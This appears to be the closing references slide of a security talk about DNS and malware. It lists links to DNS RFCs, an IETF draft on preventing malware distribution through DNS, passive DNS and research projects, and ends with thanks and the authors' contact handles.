§ http://www.ietf.org/rfc/rfc{1033,1034,1035,1183,2181}.txt
§ http://tools.ietf.org/id/draft-cmd-prevent-malware-dns-distribute-00.txt
§ http://www.wombat-project.eu/
§ http://exposure.iseclab.org/index.html
§ https://dnsdb.isc.org/#Home
§ http://www.webboar.com
§ https://dns.he.net/
§ http://www.flu-project.com/
§ http://arsofttoolsnet.codeplex.com/
Thanks for your time! @{Hlexpired,ffranz} {charlie,fran}@7d.es